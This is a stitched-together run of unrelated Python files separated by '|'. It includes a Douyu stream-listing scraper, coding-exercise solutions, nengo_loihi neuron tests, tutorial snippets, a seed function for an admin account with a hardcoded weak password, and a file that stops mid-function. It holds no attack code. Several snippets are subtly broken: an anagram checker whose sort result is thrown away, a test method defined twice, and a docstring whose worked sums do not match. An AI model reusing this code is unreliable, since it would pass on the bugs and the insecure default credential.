li_list = self.driver.find_elements_by_xpath("//ul[@class='layout-Cover-list']/li")
content_list = []
for li in li_list:
item = {}
item["room_img"] = li.find_element_by_xpath(".//div[@class='DyListCover-imgWrap']//img").get_attribute("src")
item["room_title"] = li.find_element_by_xpath(".//div[@class='DyListCover-content']//h3").get_attribute("title")
item["room_cate"] = li.find_element_by_xpath(".//div[@class='DyListCover-content']//span[@class='DyListCover-zone']").text
item["author_name"] = li.find_element_by_xpath(".//div[@class='DyListCover-content']//h2").text
item["watch_num"] = li.find_element_by_xpath(".//div[@class='DyListCover-info'][2]/span").text
print(item)
content_list.append(item)
# 获取下一页的元素
next_url = self.driver.find_elements_by_xpath("//ul[@class='dy-Pagination ListPagination']//li[@class=' dy-Pagination-next']")
print(next_url)
next_url = next_url[0] if len(next_url) > 0 else None
return content_list,next_url
def save_content_list(self,content_list):
with open("douyu.txt","a",encoding="utf-8") as f:
for content in content_list:
f.write(json.dumps(content,ensure_ascii=False,indent=2))
f.write("\n")
print("写入成功!")
def run(self):
# 1.start_url
# 2.发送请求,获取响应
self.driver.get(self.start_url)
# 3.提取数据,提取下一页的元素
time.sleep(10)
content_list,next_url = self.get_content_list()
# 4.保存数据
self.save_content_list(content_list)
# 5.点击下一页元素,循环
while next_url is not None:
next_url.click()
time.sleep(10)
content_list,next_url = self.get_content_list()
self.save_content_list(content_list)
if __name__ == "__main__":
douyu = DouyuSpider()
douyu.run()
|
from layers.domain_layer.user_aggregate import Regulator
from layers.domain_layer.repositories import UserRepository
def Generate_Regulator():
regulator = Regulator("admin","admin@admin.com","88888888","Mr Regulator","123456")
UserRepository().add(regulator)
return regulator.id
|
import yaml
import os
class YAML:
def __init__(self,filename=None):
self.__filenane=filename
self.__config_path=os.path.join(os.curdir,self.__filenane)
self.__config=self.__load_config()
def __load_config(self):
try:
with open (self.__config_path) as f:
config = yaml.safe_load(f)
except Exception as e:
raise e
return config
def get_config(self,name):
return self.__config[name]
def get_all_data(self):
return self.__config
def main(service_file,nodes_file,service_name):
service_config=YAML(service_file)
nodes_config=YAML(nodes_file)
nodes=service_config.get_config(service_name)
for node in nodes:
print(nodes_config.get_config(node))
if __name__ == '__main__':
main("services","nodes","servicea") |
"""
15. 3Sum
Medium
19433
1856
Add to List
Share
Given an integer array nums, return all the triplets [nums[i], nums[j], nums[k]] such that i != j, i != k, and j != k, and nums[i] + nums[j] + nums[k] == 0.
Notice that the solution set must not contain duplicate triplets.
Example 1:
Input: nums = [-1,0,1,2,-1,-4]
Output: [[-1,-1,2],[-1,0,1]]
Explanation:
nums[0] + nums[1] + nums[1] = (-1) + 0 + 1 = 0.
nums[1] + nums[2] + nums[4] = 0 + 1 + (-1) = 0.
nums[0] + nums[3] + nums[4] = (-1) + 2 + (-1) = 0.
The distinct triplets are [-1,0,1] and [-1,-1,2].
Notice that the order of the output and the order of the triplets does not matter.
Example 2:
Input: nums = [0,1,1]
Output: []
Explanation: The only possible triplet does not sum up to 0.
Example 3:
Input: nums = [0,0,0]
Output: [[0,0,0]]
Explanation: The only possible triplet sums up to 0.
Constraints:
3 <= nums.length <= 3000
-105 <= nums[i] <= 105
"""
from typing import List
from collections import defaultdict
class Solution:
def threeSum(self, nums: List[int]) -> List[List[int]]:
# create dictionary of 2sum: List[{index 1, index2}]
# for each number, flip sign, and see if it exists as key in dictionary. append this number to each tuple in dict entry list.
dict_2sum_tupleset = defaultdict(set)
set_3sum = set()
nums = sorted(nums)
for i in range(len(nums)):
if i <= 2 or nums[i] == 0 or (nums[i] != nums[i-1]):
for j in range(len(nums)):
if i != j and (j <= 2 or nums[j] == 0 or (nums[j] != nums[j-2])):
dict_2sum_tupleset[nums[i] + nums[j]].add((min(i, j), max(i, j)))
for tup in dict_2sum_tupleset[nums[i] * (-1)]:
if i != tup[0] and i != tup[1]:
if nums[tup[0]] > nums[tup[1]]:
tup = (tup[1], tup[0])
if nums[i] > nums[tup[1]]:
new_triple = (nums[tup[0]], nums[tup[1]], nums[i])
elif nums[i] < nums[tup[0]]:
new_triple = (nums[i], nums[tup[0]], nums[tup[1]])
else:
new_triple = (nums[tup[0]], nums[i], nums[tup[1]])
set_3sum.add(new_triple)
return [list(trip) for trip in set_3sum]
|
n = int(input())
a = list(map(int, input().split()))
lists = [i for i in range(1, n + 1)]
dicts = {j:i for i, j in zip(lists, a)}
for i in range(1, n + 1):
print(dicts[i], end=' ')
print()
|
"""
This module will query the OWL Ontology based on a user's inputted genre to
select a set of instruments as midi program integers
"""
import owlready2 as owl
from music21 import instrument
def load_ontology():
return owl.get_ontology("root-ontology.owl").load()
def get_genre_map(ontology):
genres = {}
key = 0
for individual in ontology.search(type=ontology.MusicalGenre):
genres.update({key: individual})
key += 1
return genres
def get_instruments(genre, ontology):
programs = []
if genre.label[0] == "Blues":
programs.append(instrument.AcousticGuitar().midiProgram)
programs.append(instrument.Harmonica().midiProgram)
programs.append(instrument.TomTom().midiProgram)
elif genre.label[0] == "Folk":
programs.append(instrument.Banjo().midiProgram)
programs.append(instrument.AcousticBass().midiProgram)
programs.append(instrument.Piano().midiProgram)
elif genre.label[0] == "Rock":
programs.append(instrument.ElectricGuitar().midiProgram)
programs.append(instrument.ElectricBass().midiProgram)
programs.append(instrument.BassDrum().midiProgram)
elif genre.label[0] == "Classical":
programs.append(instrument.Violin().midiProgram)
programs.append(instrument.Oboe().midiProgram)
programs.append(instrument.Flute().midiProgram)
programs.append(instrument.Viola().midiProgram)
elif genre.label[0] == "Country":
programs.append(instrument.AcousticGuitar().midiProgram)
programs.append(instrument.Banjo().midiProgram)
programs.append(instrument.TomTom().midiProgram)
return programs
|
# Problem 1209. 1, 10, 100, 1000...
# http://acm.timus.ru/problem.aspx?space=1&num=1209
# See the sequence
# 1
# 10
# 100
# 1000
# 10000
# 100000
# We get '1' after a '0' increased
# The sequence of getting '1' is 1,2,4,7,11,16 and so on
# if we multiple a number by 8 and subtrack by 7 and the result
# of the equation can be sqrt without getting fractional value
# then the position is 1.
# like (8*7)-7 = 56-7 = 49
# √49 = 7.0
# so we get no fractonal number
from math import modf,sqrt
def checkOne(num):
if modf(sqrt((8*num)-7))[0]==0:
return '1 '
else:
return '0 '
result = ''
for x in range(int(input())):
result+=checkOne(int(input()))
print(result.lstrip()) |
__author__ = 'Chaithra'
from listutils import *
#
notes = """
This is to make you familiar with linked list structures usage in python
see the listutils.py module for some helper functions
"""
class Node:
def __init__(self, value=None):
self.value = value
self.next = None
#given the head of a list,
# reverse the list and return the head of the reversed list
def reverse_linked_list(head):
current=Node()
temp1=None
while head!=None:
current=head
head=head.next
current.next=temp1
temp1=current
return from_linked_list(temp1)
#write test cases covering all cases for your solution
def test_reverse_linked_list():
assert [4,3,2,1]==reverse_linked_list(to_linked_list([1,2,3,4]))
assert []==reverse_linked_list(to_linked_list([]))
assert [0]==reverse_linked_list(to_linked_list([0]))
|
from PyObjCTools.TestSupport import *
import CoreWLAN
class TestCWNetwork (TestCase):
@min_os_level('10.7')
def test_methods10_7(self):
self.assertResultIsBOOL(CoreWLAN.CWNetwork.ibss);
@min_os_level('10.6')
def test_methods10_6(self):
self.assertResultIsBOOL(CoreWLAN.CWNetwork.isEqualToNetwork_);
self.assertResultIsBOOL(CoreWLAN.CWNetwork.isIBSS);
@min_os_level('10.7')
def test_methods10_7(self):
self.assertResultIsBOOL(CoreWLAN.CWNetwork.supportsSecurity_);
self.assertResultIsBOOL(CoreWLAN.CWNetwork.supportsPHYMode_);
if __name__ == "__main__":
main()
|
from turtle import Turtle,Screen
import random
import turtle as t
# COLORS = [(236, 235, 230), (239, 228, 234), (223, 240, 231), (227, 232, 241), (240, 37, 113), (146, 25, 72), (218, 161, 64), (14, 144, 88), (239, 73, 35), (186, 169, 36), (29, 127, 193), (56, 190, 230), (245, 220, 53), (178, 42, 102), (35, 175, 119), (129, 189, 104), (78, 27, 81), (209, 62, 28), (251, 226, 0), (146, 31, 26)]
#tim = Turtle()
# def random_color():
# return random.choice(COLORS)
# tim.dot(20,random_color())
tim = t.Turtle()
t.colormode(255)
#rand_colours = [random.choice(COLORS) for i in range(3)]
COLORS = [(139, 0, 0),
(0, 100, 0),
(0, 0, 139)]
def random_color():
return random.choice(COLORS)
for i in range(3):
tim.dot(20,random_color())
#tim.dot(20,random_color)
screen = Screen()
screen.exitonclick() |
import numpy as np
import scipy.sparse as sp
import argparse
import random
nodes_map = {
}
def read_dat(path, file_name):
path = path + file_name
data = np.loadtxt(path, delimiter='\t', dtype=np.int)
return data
def gen_nodes_map(path, node_type):
data = read_dat(path=path, file_name="%s.txt" % node_type)
if node_type not in nodes_map:
nodes_map[node_type] = len(data)
def encode_onehot(labels):
classes = set(labels)
classes_dict = {c: np.identity(len(classes))[i, :] for i, c in
enumerate(classes)}
labels_onehot = np.array(list(map(classes_dict.get, labels)),
dtype=np.int32)
return labels_onehot
def gen_labels(target_type, label_file, ispart=True, input_dir='./', output_dir='./'):
# the label file: <node_idx>\t<label_idx>. if <node_idx> has not a label, <label_idx> is fixed as 0,
labels = read_dat(path=input_dir, file_name=label_file)
labels_part = []
for j in labels:
if ispart:
if j[1] != 0:
labels_part.append(j)
else:
labels_part.append(j)
with open(output_dir + '%s.label.all' % target_type, 'w') as fall:
for l in labels:
fall.write('{}\n'.format(l[1]))
with open(output_dir + '%s.label.part' % target_type, 'w') as fpart:
for l in labels_part:
fpart.write('{}\t{}\n'.format(l[0], l[1]))
def label_feature(path, output_path, node_type, target_type, ispart):
labels = np.loadtxt(path, delimiter='\t', dtype=np.dtype(str))
class_num = len(set(list(labels))) - 1
if node_type == target_type:
feat = encode_onehot(labels)
if ispart:
feat = feat[:, 1:] # if there exist the nodes without labels
feat = sp.csr_matrix(feat)
else:
entity_n = nodes_map[node_type]
sample_n = class_num
feat = sp.csr_matrix(np.zeros([entity_n, sample_n]))
sp.save_npz(output_path, feat)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="your script description")
parser.add_argument('--target-type', type=str)
parser.add_argument('--node-list', type=str)
parser.add_argument('--label-file', type=str)
parser.add_argument('--ispart', type=str)
parser.add_argument('--input-dir', type=str)
parser.add_argument('--output-dir', type=str)
args = parser.parse_args()
target_type = args.target_type
ispart = True if args.ispart == 'True' else False
input_dir = args.input_dir + '/' if args.input_dir[-1] != '/' else args.input_dir
output_dir = args.output_dir + '/' if args.output_dir[-1] != '/' else args.output_dir
gen_labels(target_type=target_type, label_file=args.label_file, ispart=ispart,
input_dir=input_dir, output_dir=output_dir)
node_types = args.node_list.split(',')
for node_type in node_types:
gen_nodes_map(path=input_dir, node_type=node_type)
label_feature(path=output_dir + '%s.label.all' % target_type,
output_path=output_dir + '%s.feat.label' % node_type,
node_type=node_type,
target_type=target_type, ispart=ispart)
|
def dictionary(openfile):
lines = open(openfile)
word_count_list = {}
for line in lines:
line = line.rstrip()
words = line.split()
for word in words:
word_count_list[word] = word_count_list.get(word, 0) + 1
for word, count in word_count_list.items():
print(word, count)
print(dictionary("test.txt"))
|
print('Part 1')
list=[0]
for line in open('input.txt'):
list.append(int(line.split('\n')[0]))
sortd=sorted(list)
i=0
counter1=1
counter3=1
while i<(len(sortd)-1):
if sortd[i+1]-sortd[i]==1:
counter1=counter1+1
if sortd[i+1]-sortd[i]==3:
counter3=counter3+1
i=i+1
print(counter1*counter3)
print('Part 2')
# I added "195" to the list
count = len(open('input.txt').readlines( ))
def FindNeighbours(i):
index=sortd.index(i)
#find neighbours in the list that are not part of the earlier numbers
result=[]
j=index+1
while j<count+1:
k=sortd[j]
#this finds the neighbours
if not i==k and abs(i-k)<=3:
result.append(str(k))
j=j+1
return result
possibilities={'0':1}
a=0
counter=0
finalcombo={}
while a<count:
start={}
for combo in possibilities:
# last number, previous numbers and new possibilites to carry on the string
lastnumber=combo.split(':')[-1]
newletters = FindNeighbours(int(lastnumber))
if not newletters==[]:
if not newletters==['195']:
for poss in newletters:
#if there are new items to append&we haven't reached the end, create a new start array
if combo.count(':')>5:
#no need to have stupidly long strings
shortercombo=':'.join(combo.split(':')[1:])
newcombo=shortercombo+':'+poss
if newcombo in start:
start[newcombo]=start[newcombo]+possibilities[combo]
else:
start[newcombo]=possibilities[combo]
else:
start[combo+':'+poss]=possibilities[combo]
else:
if combo in finalcombo:
finalcombo[combo]=finalcombo[combo]+possibilities[combo]
else:
finalcombo[combo]=possibilities[combo]
possibilities=start
a=a+1
summed=0
for item in finalcombo:
summed=summed+finalcombo[item]
print("Answer:",summed)
#print(sortd)
|
#Import the json library
import json
'''
Two important json methods for json.dump and json.dumps
json.dump ==> to dump a python object into a text file in json format
json.dumps ==> to convert a python object into string representation of the json format.
'''
friend1 = {"Raunaq": [24, "India"]}
friend2 = {"Milony": [25, "United States"]}
friends = (friend1, friend2)
'''SERIALIZATION'''
with open('friends.json', 'w') as file:
json.dump(friends, file, indent=4)
print (json.dumps(friends, indent = 4))
'''DESERIALIZATION'''
'''
Two important methods used for deserialization are
json.load and json.loads
json.load ==> is used to take convert the json format to a python object
json.loads ==> is used to just converted the string representation json to the python object.
JSON doesn't support all of the python data types
Doesnt support set at all, and converts a list or tuple to an array. Dictionary becomes a json object. True to true, False to false, None to null, etc.
'''
with open('friends.json') as file:
content = json.load(file)
print (content)
content_string = """
[
{
"Raunaq": [
24,
"India"
]
},
{
"Milony": [
25,
"United States"
]
}
]
"""
print (json.loads(content_string))
#DISCLAIMER: MAKE SURE YOU NOTICE THAT THE TUPLE HAS BEEN CONVERTED TO AN ARRAY BY JSON
|
def alphabetize(thisString):
newString = ''
newString.join(sorted(thisString))
return newString
def anagram(aString, bString):
if len(aString) != len(bString):
return False
aString = alphabetize(aString)
bString = alphabetize(bString)
if aString == bString:
return True
else:
return False
a = anagram("dad","add")
print a
a = anagram("bad","add")
print a
a = anagram("ddad","add")
print a
a = anagram("ohmygodicantbelieveit","ogeodilycantbmievheit")
print a
a = anagram("herp","suckit")
print a
a = anagram("david","divad")
print a
|
import nengo
import numpy as np
import pytest
from nengo.exceptions import BuildError
from nengo_loihi.builder import Model
from nengo_loihi.neurons import nengo_rates
@pytest.mark.parametrize("tau_ref", [0.001, 0.003, 0.005])
def test_lif_response_curves(tau_ref, Simulator, plt):
n = 256
encoders = np.ones((n, 1))
gain = np.zeros(n)
bias = np.linspace(1, 30, n)
with nengo.Network() as model:
a = nengo.Ensemble(
n,
1,
neuron_type=nengo.LIF(tau_ref=tau_ref),
encoders=encoders,
gain=gain,
bias=bias,
)
ap = nengo.Probe(a.neurons)
dt = 0.001
with Simulator(model, dt=dt) as sim:
sim.run(1.0)
scount = np.sum(sim.data[ap] > 0, axis=0)
def rates(tau_ref, gain=gain, bias=bias):
lif = nengo.LIF(tau_ref=tau_ref)
return nengo_rates(lif, 0.0, gain, bias).squeeze(axis=0)
upper_bound = rates(tau_ref=tau_ref)
lower_bound = rates(tau_ref=tau_ref + dt)
mid = rates(tau_ref=tau_ref + 0.5 * dt)
plt.title("tau_ref=%.3f" % tau_ref)
plt.plot(bias, upper_bound, "k")
plt.plot(bias, lower_bound, "k")
plt.plot(bias, mid, "b")
plt.plot(bias, scount, "g", label="Spike count on Loihi")
plt.xlabel("Bias current")
plt.ylabel("Firing rate (Hz)")
plt.legend(loc="best")
assert scount.shape == upper_bound.shape == lower_bound.shape
assert np.all(scount <= upper_bound + 1)
assert np.all(scount >= lower_bound - 1)
def test_relu_response_curves(Simulator, plt, allclose):
n = 256
encoders = np.ones((n, 1))
gain = np.zeros(n)
bias = np.linspace(0, 50, n)
with nengo.Network() as model:
a = nengo.Ensemble(
n,
1,
neuron_type=nengo.SpikingRectifiedLinear(),
encoders=encoders,
gain=gain,
bias=bias,
)
ap = nengo.Probe(a.neurons)
dt = 0.001
t_final = 1.0
with Simulator(model, dt=dt) as sim:
sim.run(t_final)
scount = np.sum(sim.data[ap] > 0, axis=0)
actual = nengo.SpikingRectifiedLinear().rates(0.0, gain, bias)
plt.plot(bias, actual, "b", label="Ideal")
plt.plot(bias, scount, "g", label="Loihi")
plt.xlabel("Bias current")
plt.ylabel("Firing rate (Hz)")
plt.legend(loc="best")
assert allclose(actual, scount, atol=5)
@pytest.mark.parametrize("amplitude", (0.1, 0.5, 1))
@pytest.mark.parametrize("neuron_type", (nengo.SpikingRectifiedLinear, nengo.LIF))
def test_amplitude(Simulator, amplitude, neuron_type, seed, plt, allclose):
with nengo.Network(seed=seed) as net:
a = nengo.Node([0.5])
n = 100
ens = nengo.Ensemble(n, 1, neuron_type=neuron_type(amplitude=amplitude))
ens2 = nengo.Ensemble(
n,
1,
gain=np.ones(n),
bias=np.zeros(n),
neuron_type=nengo.SpikingRectifiedLinear(),
)
nengo.Connection(a, ens)
# note: slight boost on transform so that the post neurons are pushed
# over threshold, rather than ==threshold
nengo.Connection(
ens.neurons, ens2.neurons, synapse=None, transform=np.eye(n) * 1.02
)
node = nengo.Node(size_in=n)
nengo.Connection(ens.neurons, node, synapse=None)
ens_p = nengo.Probe(ens, synapse=0.1)
neuron_p = nengo.Probe(ens.neurons)
indirect_p = nengo.Probe(node)
neuron2_p = nengo.Probe(ens2.neurons)
with Simulator(net, precompute=True) as sim:
sim.run(1)
spikemean1 = np.mean(sim.data[neuron_p], axis=0)
spikemean2 = np.mean(sim.data[neuron2_p], axis=0)
plt.subplot(211)
plt.plot(sim.trange(), sim.data[ens_p])
plt.subplot(212)
i = np.argsort(spikemean1)
plt.plot(spikemean1[i])
plt.plot(spikemean2[i], linestyle="--")
assert allclose(sim.data[ens_p][sim.trange() > 0.9], 0.5, atol=0.05)
assert np.max(sim.data[neuron_p]) == amplitude / sim.dt
# the identity neuron-to-neuron connection causes `ens2` to fire at
# `amplitude` * the firing rate of `ens` (i.e., the same overall firing
# rate as `ens`)
assert allclose(spikemean1, spikemean2, atol=1)
# note: one-timestep delay, despite synapse=None
assert allclose(sim.data[neuron_p][:-1], sim.data[indirect_p][1:])
def test_bad_gain_error(Simulator):
with nengo.Network() as net:
nengo.Ensemble(5, 1, intercepts=nengo.dists.Choice([2.0]))
model = Model()
model.intercept_limit = 10.0
with pytest.raises(BuildError, match="negative.*gain"):
with Simulator(net, model=model):
pass
def test_neuron_build_errors(Simulator):
# unsupported neuron type
with nengo.Network() as net:
nengo.Ensemble(5, 1, neuron_type=nengo.neurons.Sigmoid(tau_ref=0.005))
with pytest.raises(BuildError, match="type 'Sigmoid' cannot be simulated"):
with Simulator(net):
pass
# unsupported RegularSpiking type
with nengo.Network() as net:
nengo.Ensemble(
5, 1, neuron_type=nengo.RegularSpiking(nengo.Sigmoid(tau_ref=0.005))
)
with pytest.raises(BuildError, match="RegularSpiking.*'Sigmoid'.*cannot be simu"):
with Simulator(net):
pass
# amplitude with RegularSpiking base type
with nengo.Network() as net:
nengo.Ensemble(
5, 1, neuron_type=nengo.RegularSpiking(nengo.LIFRate(amplitude=0.5))
)
with pytest.raises(BuildError, match="Amplitude is not supported on RegularSpikin"):
with Simulator(net):
pass
# non-zero initial voltage warning
with nengo.Network() as net:
nengo.Ensemble(
5,
1,
neuron_type=nengo.LIF(initial_state={"voltage": nengo.dists.Uniform(0, 1)}),
)
with pytest.warns(Warning, match="initial values for 'voltage' being non-zero"):
with Simulator(net):
pass
@pytest.mark.parametrize("radius", [0.01, 1, 100])
def test_radius_probe(Simulator, seed, radius):
with nengo.Network(seed=seed) as model:
stim = nengo.Node(radius / 2.0)
ens = nengo.Ensemble(
n_neurons=100,
dimensions=1,
radius=radius,
intercepts=nengo.dists.Uniform(-0.95, 0.95),
)
nengo.Connection(stim, ens)
p = nengo.Probe(ens, synapse=0.1)
with Simulator(model, precompute=True) as sim:
sim.run(0.5)
assert np.allclose(sim.data[p][-1:], radius / 2.0, rtol=0.1)
@pytest.mark.parametrize("radius1", [0.01, 100])
@pytest.mark.parametrize("radius2", [0.01, 100])
@pytest.mark.parametrize("weights", [True, False])
def test_radius_ens_ens(Simulator, seed, radius1, radius2, weights):
with nengo.Network(seed=seed) as model:
stim = nengo.Node(radius1 / 2.0)
a = nengo.Ensemble(
n_neurons=100,
dimensions=1,
radius=radius1,
intercepts=nengo.dists.Uniform(-0.95, 0.95),
)
b = nengo.Ensemble(
n_neurons=100,
dimensions=1,
radius=radius2,
intercepts=nengo.dists.Uniform(-0.95, 0.95),
)
nengo.Connection(stim, a)
nengo.Connection(
a,
b,
synapse=0.01,
transform=radius2 / radius1,
solver=nengo.solvers.LstsqL2(weights=weights),
)
p = nengo.Probe(b, synapse=0.1)
with Simulator(model, precompute=True) as sim:
sim.run(0.4)
assert np.allclose(sim.data[p][-1:], radius2 / 2.0, rtol=0.2)
|
while True:
m = int(input('Введите месяц числом от 1 до 12'))
e = 0
r = 12
if m >= e or m < r:
win = [1, 2, 12]
sprig = [3, 4, 5]
sam = [6, 7, 8]
aut = [9, 10, 11]
if win.count(m) == 1:
print('Зима')
else:
if sprig.count(m) == 1:
print('Весна')
else:
if sam.count(m) == 1:
print('Лето')
else:
if aut.count(m) == 1:
print('Осень')
else:
print('Прошу вас от 1 до 12')
|
class Tracer:
def __init__(self):
self.IsEnabled = True
def __call__(self, f):
def wrap(*args, **kwargs):
if self.IsEnabled:
print('Tracing is happening')
return f(*args, **kwargs)
return wrap
tracer = Tracer()
@tracer
def rotate_list(lst):
return lst[1:] +[lst[0]]
lst = [1,2,3]
print(rotate_list(lst))
tracer.IsEnabled = False
print(rotate_list(lst))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Take absolute value. Needed before smooth if amplitudes are negative!
# Implemented by Martin Hardcastle based on clip/flag code
import logging
from operations_lib import *
logging.debug('Loading ABS module.')
def run( step, parset, H ):
import numpy as np
from h5parm import solFetcher, solWriter
soltabs = getParSoltabs( step, parset, H )
ants = getParAxis( step, parset, H, 'ant' )
pols = getParAxis( step, parset, H, 'pol' )
dirs = getParAxis( step, parset, H, 'dir' )
# No need to specify an axis, just use time
axesToAbs = ['time']
for soltab in openSoltabs( H, soltabs ):
sf = solFetcher(soltab)
sw = solWriter(soltab)
logging.info("Taking ABSolute value of soltab: "+soltab._v_name)
sf.setSelection(ant=ants, pol=pols, dir=dirs)
total=0
count=0
for vals, coord in sf.getValuesIter(returnAxes=axesToAbs):
total+=len(vals)
count+=np.count_nonzero(vals<0)
valsnew=np.abs(vals)
# writing back the solutions
coord = removeKeys(coord, axesToAbs)
sw.setSelection(**coord)
sw.setValues(valsnew)
logging.info('Abs: %i points initially negative (%f %%)' % (count,float(count)/total))
sw.addHistory('ABSolute value taken')
return 0
|
def multiply(x, y):
return x * y
def subtract(x, y):
return x - y
def divide(x, y):
return x / y
def square(x):
return x**2
def raise_to(x, y):
print("This function raises x to the power y")
return x**y
def add(x, y):
return x + y
|
from engine import get_psql_engine
from jinja2 import Environment
from sql_templates import SIMPLE_SEARCH_TEMPLATE, SEARCH_TEMPLATE, SIMPLE_MATCH_TEMPLATE, MATCH_TEMPLATE
from config import PPM_DIFF,RT_DIFF,WITH_MS2,EXCLUDE_CONTROLS,INT_OVER_CONTROLS,ATTRS
def construct_search(mz,rt,ion_mode,config):
ppm_diff = config.get(PPM_DIFF)
rt_diff = config.get(RT_DIFF)
ioc = config.get(INT_OVER_CONTROLS)
attrs = config.get(ATTRS)
with_ms2 = config.get(WITH_MS2)
exclude_controls = config.get(EXCLUDE_CONTROLS)
if not exclude_controls:
query = Environment().from_string(SIMPLE_SEARCH_TEMPLATE).render({
'with_ms2': with_ms2
})
params = (ion_mode,mz,ppm_diff,rt,rt_diff)
else:
query = Environment().from_string(SEARCH_TEMPLATE).render({
'attrs': attrs,
'ioc': ioc,
'with_ms2': with_ms2
})
if ioc is not None:
params = (ion_mode,mz,ppm_diff,rt,rt_diff,ioc)
else:
params = (ion_mode,mz,ppm_diff,rt,rt_diff)
return query, params
def construct_match(exp_name,ion_mode,config):
ppm_diff = config.get(PPM_DIFF)
rt_diff = config.get(RT_DIFF)
ioc = config.get(INT_OVER_CONTROLS)
attrs = config.get(ATTRS)
with_ms2 = config.get(WITH_MS2)
exclude_controls = config.get(EXCLUDE_CONTROLS)
if not exclude_controls:
query = Environment().from_string(SIMPLE_MATCH_TEMPLATE).render({
'with_ms2': with_ms2
})
params = (ion_mode,exp_name,ion_mode,ppm_diff,rt_diff)
else:
query = Environment().from_string(MATCH_TEMPLATE).render({
'attrs': attrs,
'ioc': ioc,
'with_ms2': with_ms2
})
if ioc is not None:
params = (ion_mode,exp_name,ioc,ion_mode,ppm_diff,rt_diff)
else:
params = (ion_mode,exp_name,ion_mode,ppm_diff,rt_diff)
return query, params
def search(engine,mz,rt,ion_mode,config):
"""returns ResultProxy"""
c = engine.connect()
query, params = construct_search(mz,rt,ion_mode,config)
return c.execute(query,*params)
def match(engine,exp_name,ion_mode,config):
c = engine.connect()
query, params = construct_match(exp_name,ion_mode,config)
return c.execute(query,*params)
def results_as_csv(r):
rows = r.fetchall()
cols = [x for x in r.keys() if x != 'attrs']
if not rows:
yield ','.join(cols)
return
# determine column headings
attrs = []
for row in rows:
for kv in dict(row.items()).get('attrs'):
k, v = kv.split('=')
if k not in attrs and k != 'ignore':
attrs += [k]
cols += attrs
yield ','.join(cols)
# now postprocess rows
for row in rows:
rd = dict(row.items())
# explode attrs
ad = dict([kv.split('=') for kv in rd['attrs']])
del rd['attrs']
rd.update(ad) # FIXME avoid name collisions
yield ','.join(str(rd.get(c,'')) for c in cols)
def test(engine):
cases = [
dict(mz=100,rt=90),
dict(mz=102,rt=90),
dict(mz=102,rt=200),
dict(mz=103,rt=100),
dict(mz=105,rt=80,ioc=10),
dict(mz=107,rt=200,attrs=['media']),
dict(mz=108,rt=100,attrs=['media']),
dict(mz=109,rt=500,attrs=['media','time']),
dict(mz=111,rt=500,attrs=['media','time']),
dict(mz=113,rt=100,attrs=['media'],ioc=10),
dict(mz=113,rt=200,attrs=['media'],ioc=10),
dict(mz=114,rt=100,attrs=['media'],ioc=10),
dict(mz=116,rt=100,attrs=['media','time'],ioc=10)
]
for case in cases:
print case
r = search(engine,
case.get('mz'),
case.get('rt'),
ioc=case.get('ioc'),
attrs=case.get('attrs',[]))
for line in results_as_csv(r):
print line
if __name__=='__main__':
engine = get_psql_engine()
test(engine)
|
# read three numbers
number1 = int(input("Enter the first number: "))
number2 = int(input("Enter the second number: "))
number3 = int(input("Enter the third number: "))
# We temporarily assume that the first number
# is the largest one.
# We will verify this soon.
largest_number = number1
# we check if the second number is larger than current largest_number
# and update largest_number if needed
if number2 > largest_number:
largest_number = number2
# we check if the third number is larger than current largest_number
# and update largest_number if needed
if number3 > largest_number:
largest_number = number3
# print the result
print("The largest number is:", largest_number) |
import FWCore.ParameterSet.Config as cms
# Silicon Strip Digitizer running with APV Mode Deconvolution
from SimGeneral.MixingModule.stripDigitizer_cfi import *
stripDigitizer.APVpeakmode = False
|
# 1. combo_string
def combo_string(a, b):
if len(a) > len(b):
return b + a + b
else:
return a + b + a
# 2. extra_end
def extra_end(str):
temp = str[-2:]
return temp + temp + temp
# 3. first_half
def first_half(str):
return str[:len(str) // 2]
# 4. first_two
def first_two(str):
if len(str) <= 2:
return str
return str[:2]
# 5. hello_name
def hello_name(name):
return "Hello " + name + "!"
# 6. left2
def left2(str):
if (len(str) <= 2):
return str
a = str[:2]
b = str[2:]
return b + a
# 7. make_abba
def make_abba(a, b):
return a + b + b + a
# 8. make_out_word
def make_out_word(out, word):
return out[:2] + word + out[2:]
# 9. make_tags
def make_tags(tag, word):
return "<" + tag + ">" + word + "</" + tag + ">"
# 10. non-start
def non_start(a, b):
return a[1:] + b[1:]
# 11. without_end
def without_end(str):
return str[1:len(str) - 1]
|
for i in range(101):
if( i % 5 == 0 and i % 2 == 0):
print(i, 'zip', 'zap')
elif( i % 2 == 0):
print(i, 'zip')
elif( i % 5 == 0):
print(i, 'zap')
else:
print(i)
#please note that there are many solutions to this problem
# Here is what the output should look like:
# 0 zip zap
# 1
# 2 zip
# 3
# 4 zip
# 5 zap
# 6 zip
# 7
# 8 zip
# 9
# 10 zip zap
# 11
# 12 zip
# 13
# 14 zip
# 15 zap
# 16 zip
# 17
# 18 zip
# 19
# 20 zip zap
# 21
# 22 zip
# 23
# 24 zip
# 25 zap
# 26 zip
# 27
# 28 zip
# 29
# 30 zip zap
# 31
# 32 zip
# 33
# 34 zip
# 35 zap
# 36 zip
# 37
# 38 zip
# 39
# 40 zip zap
# 41
# 42 zip
# 43
# 44 zip
# 45 zap
# 46 zip
# 47
# 48 zip
# 49
# 50 zip zap
# 51
# 52 zip
# 53
# 54 zip
# 55 zap
# 56 zip
# 57
# 58 zip
# 59
# 60 zip zap
# 61
# 62 zip
# 63
# 64 zip
# 65 zap
# 66 zip
# 67
# 68 zip
# 69
# 70 zip zap
# 71
# 72 zip
# 73
# 74 zip
# 75 zap
# 76 zip
# 77
# 78 zip
# 79
# 80 zip zap
# 81
# 82 zip
# 83
# 84 zip
# 85 zap
# 86 zip
# 87
# 88 zip
# 89
# 90 zip zap
# 91
# 92 zip
# 93
# 94 zip
# 95 zap
# 96 zip
# 97
# 98 zip
# 99
# 100 zip zap |
from django.apps import AppConfig
class ShopifywebhooksConfig(AppConfig):
name = 'shopifywebhooks'
|
import os.path
import os
import subprocess
import distutils.sysconfig
# Set these to None for debugging or subprocess.PIPE to silence compiler
# warnings and errors.
STDOUT = subprocess.PIPE
STDERR = subprocess.PIPE
# STDOUT = None
# STDERR = None
# This is the max length that I want a printed line to be.
MAX_LINE_LENGTH = 78
PYTHON_INCLUDE_DIR = os.path.dirname(distutils.sysconfig.get_config_h_filename())
# print(PYTHON_INCLUDE_DIR)
def line_wrap_paragraph(s):
# Format s with terminal-friendly line wraps.
done = False
beginning = 0
end = MAX_LINE_LENGTH - 1
lines = []
while not done:
if end >= len(s):
done = True
